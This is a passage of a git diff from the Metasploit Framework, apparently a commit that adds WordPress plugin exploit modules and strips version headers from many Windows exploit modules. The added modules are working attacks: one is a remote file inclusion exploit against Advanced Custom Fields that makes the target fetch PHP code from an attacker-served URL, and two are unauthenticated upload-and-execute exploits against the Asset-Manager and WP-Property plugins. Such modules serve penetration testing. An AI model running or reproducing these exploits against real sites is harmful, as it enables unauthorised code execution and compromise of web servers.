[ + 'Charlie Eriksen ', + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['OSVDB', '87353'], + ['URL', 'http://secunia.com/advisories/51037/'], + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + 'Compat' => + { + 'ConnectionType' => 'find', + }, + }, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Nov 14 2012', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/']), + OptString.new('PLUGINSPATH', [true, 'The relative path to the plugins folder', 'wp-content/plugins/']) + ], self.class) + end + + def check + uri = target_uri.path + uri << '/' if uri[-1,1] != '/' + uri << datastore['PLUGINSPATH'] + uri << '/' if uri[-1,1] != '/' + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{uri}advanced-custom-fields/core/api.php" + }) + + if res and res.code == 200 + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end + end + + def php_exploit + uri = target_uri.path + uri << '/' if uri[-1,1] != '/' + uri << datastore['PLUGINSPATH'] + uri << '/' if uri[-1,1] != '/' + + print_status('Sending request') + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{uri}advanced-custom-fields/core/actions/export.php", + 'data' => "acf_abspath=#{php_include_url}" + }) + + if res and res.body =~ /allow_url_include/ + fail_with(Exploit::Failure::NotVulnerable, 'allow_url_include is disabled') + elsif res.code != 200 + fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}") + end + + end + +end + diff --git a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb new file mode 100644 index 0000000000..c49bf6f6ad --- /dev/null +++ b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb @@ -0,0 +1,91 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'msf/core/exploit/php_exe' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::PhpEXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability', + 'Description' => %q{ + This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress + plugin. By abusing the upload.php file, a malicious user can upload a file to a + temp directory without authentication, which results in arbitrary code execution. + }, + 'Author' => + [ + 'Sammy FORGIT', # initial discovery + 'James Fitts ' # metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'OSVDB', '82653' ], + [ 'BID', '53809' ], + [ 'EDB', '18993' ], + [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html' ] + ], + 'Payload' => + { + 'BadChars' => "\x00", + }, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], + [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'May 26 2012')) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress']) + ], self.class) + end + + def exploit + uri = target_uri.path + uri << '/' if uri[-1,1] != '/' + peer = "#{rhost}:#{rport}" + payload_name = "#{rand_text_alpha(5)}.php" + php_payload = get_write_exec_payload(:unlink_self=>true) + + data = Rex::MIME::Message.new + data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"") + post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') + + print_status("#{peer} - Uploading payload #{payload_name}") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php", + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => post_data + }) + + if not res or res.code != 200 or res.body !~ /#{payload_name}/ + fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") + end + + print_status("#{peer} - Executing payload #{payload_name}") + res = send_request_raw({ + 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}", + 'method' => 'GET' + }) + + if res and res.code != 200 + fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed") + end + end +end diff --git a/modules/exploits/unix/webapp/wp_property_upload_exec.rb b/modules/exploits/unix/webapp/wp_property_upload_exec.rb new file mode 100644 index 0000000000..311e03cbfb --- /dev/null +++ b/modules/exploits/unix/webapp/wp_property_upload_exec.rb @@ -0,0 +1,109 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' +require 'msf/core/exploit/php_exe' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::PhpEXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability', + 'Description' => %q{ + This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress + plugin. By abusing the uploadify.php file, a malicious user can upload a file to a + temp directory without authentication, which results in arbitrary code execution. + }, + 'Author' => + [ + 'Sammy FORGIT', # initial discovery + 'James Fitts ' # metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'OSVDB', '82656' ], + [ 'BID', '53787' ], + [ 'EDB', '18987'], + [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ] + ], + 'Payload' => + { + 'BadChars' => "\x00", + }, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], + [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Mar 26 2012')) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress']) + ], self.class) + end + + def check + uri = target_uri.path + uri << '/' if uri[-1,1] != '/' + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php" + }) + + if not res or res.code != 200 + return Exploit::CheckCode::Unknown + end + + return Exploit::CheckCode::Appears + end + + def exploit + uri = target_uri.path + uri << '/' if uri[-1,1] != '/' + + peer = "#{rhost}:#{rport}" + + @payload_name = "#{rand_text_alpha(5)}.php" + php_payload = get_write_exec_payload(:unlink_self=>true) + + data = Rex::MIME::Message.new + data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"") + data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"") + post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') + + print_status("#{peer} - Uploading payload #{@payload_name}") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php", + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => post_data + }) + + if not res or res.code != 200 or res.body !~ /#{@payload_name}/ + fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") + end + + upload_uri = res.body + + print_status("#{peer} - Executing payload #{@payload_name}") + res = send_request_raw({ + 'uri' => upload_uri, + 'method' => 'GET' + }) + end +end diff --git a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb index 2e0bd31649..b468da6060 100644 --- a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb +++ b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '66807'], diff --git a/modules/exploits/windows/antivirus/ams_xfr.rb b/modules/exploits/windows/antivirus/ams_xfr.rb index be629648df..4b1f341d5b 100644 --- a/modules/exploits/windows/antivirus/ams_xfr.rb +++ b/modules/exploits/windows/antivirus/ams_xfr.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1429' ], diff --git a/modules/exploits/windows/antivirus/symantec_iao.rb b/modules/exploits/windows/antivirus/symantec_iao.rb index 324833477a..31a6b13a7b 100644 --- a/modules/exploits/windows/antivirus/symantec_iao.rb +++ b/modules/exploits/windows/antivirus/symantec_iao.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1430' ], diff --git a/modules/exploits/windows/antivirus/symantec_rtvscan.rb b/modules/exploits/windows/antivirus/symantec_rtvscan.rb index 06b6fb6a8a..6350c5759a 100644 --- a/modules/exploits/windows/antivirus/symantec_rtvscan.rb +++ b/modules/exploits/windows/antivirus/symantec_rtvscan.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-2630'], diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb index b754f695e8..593072be82 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-1070'], diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb index ebf96d0e2e..021f5aa047 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-2508'], diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb index d40d5ad566..1cd2ef2490 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-2508'], diff --git a/modules/exploits/windows/arkeia/type77.rb b/modules/exploits/windows/arkeia/type77.rb index 0baffff721..48a7a64b5c 100644 --- a/modules/exploits/windows/arkeia/type77.rb +++ b/modules/exploits/windows/arkeia/type77.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0491' ], diff --git a/modules/exploits/windows/backdoor/energizer_duo_payload.rb b/modules/exploits/windows/backdoor/energizer_duo_payload.rb index ef13cb021e..01148288a7 100644 --- a/modules/exploits/windows/backdoor/energizer_duo_payload.rb +++ b/modules/exploits/windows/backdoor/energizer_duo_payload.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2010-0103'], diff --git a/modules/exploits/windows/backupexec/name_service.rb b/modules/exploits/windows/backupexec/name_service.rb index 2213dd87c3..0520de340a 100644 --- a/modules/exploits/windows/backupexec/name_service.rb +++ b/modules/exploits/windows/backupexec/name_service.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1172'], diff --git a/modules/exploits/windows/backupexec/remote_agent.rb b/modules/exploits/windows/backupexec/remote_agent.rb index 2d352ebd21..405182ade8 100644 --- a/modules/exploits/windows/backupexec/remote_agent.rb +++ b/modules/exploits/windows/backupexec/remote_agent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0773'], diff --git a/modules/exploits/windows/brightstor/ca_arcserve_342.rb b/modules/exploits/windows/brightstor/ca_arcserve_342.rb index 1c0fba48f9..993e56130a 100644 --- a/modules/exploits/windows/brightstor/ca_arcserve_342.rb +++ b/modules/exploits/windows/brightstor/ca_arcserve_342.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Nahuel Cayento Riva', 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '31684' ], diff --git a/modules/exploits/windows/brightstor/discovery_tcp.rb b/modules/exploits/windows/brightstor/discovery_tcp.rb index a495f6f556..9b8bba9709 100644 --- a/modules/exploits/windows/brightstor/discovery_tcp.rb +++ b/modules/exploits/windows/brightstor/discovery_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm', 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-2535'], diff --git a/modules/exploits/windows/brightstor/discovery_udp.rb b/modules/exploits/windows/brightstor/discovery_udp.rb index e829fac64c..e5a45e6e64 100644 --- a/modules/exploits/windows/brightstor/discovery_udp.rb +++ b/modules/exploits/windows/brightstor/discovery_udp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm', 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0260'], diff --git a/modules/exploits/windows/brightstor/etrust_itm_alert.rb b/modules/exploits/windows/brightstor/etrust_itm_alert.rb index 5be05ca50f..b48371a935 100644 --- a/modules/exploits/windows/brightstor/etrust_itm_alert.rb +++ b/modules/exploits/windows/brightstor/etrust_itm_alert.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-4620' ], diff --git a/modules/exploits/windows/brightstor/hsmserver.rb b/modules/exploits/windows/brightstor/hsmserver.rb index 437400204a..b113812af7 100644 --- a/modules/exploits/windows/brightstor/hsmserver.rb +++ b/modules/exploits/windows/brightstor/hsmserver.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'toto' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5082' ], diff --git a/modules/exploits/windows/brightstor/lgserver.rb b/modules/exploits/windows/brightstor/lgserver.rb index 6ce0417805..1cc2a009b7 100644 --- a/modules/exploits/windows/brightstor/lgserver.rb +++ b/modules/exploits/windows/brightstor/lgserver.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-0449' ], diff --git a/modules/exploits/windows/brightstor/lgserver_multi.rb b/modules/exploits/windows/brightstor/lgserver_multi.rb index 7aff7a7d09..2a2d6f4651 100644 --- a/modules/exploits/windows/brightstor/lgserver_multi.rb +++ b/modules/exploits/windows/brightstor/lgserver_multi.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3216' ], diff --git a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb index 41a451bdc5..a66fdb35f4 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5003' ], diff --git a/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb b/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb index 4bb856dae7..eecdb65582 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3216' ], diff --git a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb index 68c6dc0dd4..f99e6a6d59 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3216' ], diff --git a/modules/exploits/windows/brightstor/license_gcr.rb b/modules/exploits/windows/brightstor/license_gcr.rb index f00758eb42..f4d5354288 100644 --- a/modules/exploits/windows/brightstor/license_gcr.rb +++ b/modules/exploits/windows/brightstor/license_gcr.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0581' ], diff --git a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb index 4a67afd148..0c40d63f7e 100644 --- a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb +++ b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'toto' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-2139'], diff --git a/modules/exploits/windows/brightstor/message_engine.rb b/modules/exploits/windows/brightstor/message_engine.rb index 0117963341..c40077e978 100644 --- a/modules/exploits/windows/brightstor/message_engine.rb +++ b/modules/exploits/windows/brightstor/message_engine.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-0169' ], diff --git a/modules/exploits/windows/brightstor/message_engine_72.rb b/modules/exploits/windows/brightstor/message_engine_72.rb index 36a168c200..fc334f1506 100644 --- a/modules/exploits/windows/brightstor/message_engine_72.rb +++ b/modules/exploits/windows/brightstor/message_engine_72.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '68329'], diff --git a/modules/exploits/windows/brightstor/message_engine_heap.rb b/modules/exploits/windows/brightstor/message_engine_heap.rb index 4e589be74f..42237b3b53 100644 --- a/modules/exploits/windows/brightstor/message_engine_heap.rb +++ b/modules/exploits/windows/brightstor/message_engine_heap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-5143' ], diff --git a/modules/exploits/windows/brightstor/sql_agent.rb b/modules/exploits/windows/brightstor/sql_agent.rb index 5f6b22542a..8e6045e348 100644 --- a/modules/exploits/windows/brightstor/sql_agent.rb +++ b/modules/exploits/windows/brightstor/sql_agent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-1272'], diff --git a/modules/exploits/windows/brightstor/tape_engine.rb b/modules/exploits/windows/brightstor/tape_engine.rb index e60158de8c..59082d36ed 100644 --- a/modules/exploits/windows/brightstor/tape_engine.rb +++ b/modules/exploits/windows/brightstor/tape_engine.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-6076' ], diff --git a/modules/exploits/windows/brightstor/tape_engine_8A.rb b/modules/exploits/windows/brightstor/tape_engine_8A.rb index 0bac723c5b..83583db75e 100644 --- a/modules/exploits/windows/brightstor/tape_engine_8A.rb +++ b/modules/exploits/windows/brightstor/tape_engine_8A.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '68330'], diff --git a/modules/exploits/windows/brightstor/universal_agent.rb b/modules/exploits/windows/brightstor/universal_agent.rb index eed21a3cee..6defe3125b 100644 --- a/modules/exploits/windows/brightstor/universal_agent.rb +++ b/modules/exploits/windows/brightstor/universal_agent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-1018'], diff --git a/modules/exploits/windows/browser/adobe_cooltype_sing.rb b/modules/exploits/windows/browser/adobe_cooltype_sing.rb index 85c9047d2a..0a64ebeae4 100644 --- a/modules/exploits/windows/browser/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/browser/adobe_cooltype_sing.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote '@vicheck', # initial analysis 'jduck' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-2883' ], diff --git a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb index da4cf1e2d0..eb574e2257 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -39,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'mr_me ', # msf exploit 'Unknown' # malware version seen used in targeted attacks ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2011-2110'], diff --git a/modules/exploits/windows/browser/adobe_flashplayer_avm.rb b/modules/exploits/windows/browser/adobe_flashplayer_avm.rb index bd1da5a0bd..32e39faa92 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_avm.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_avm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -39,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'bannedit', # Metasploit version, 'Unknown' # Malcode version seen used in targeted attacks ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2011-0609'], diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb index c481b5ae92..b8e973af38 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote victim machine in order to work properly. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'sinn3r', diff --git a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb index 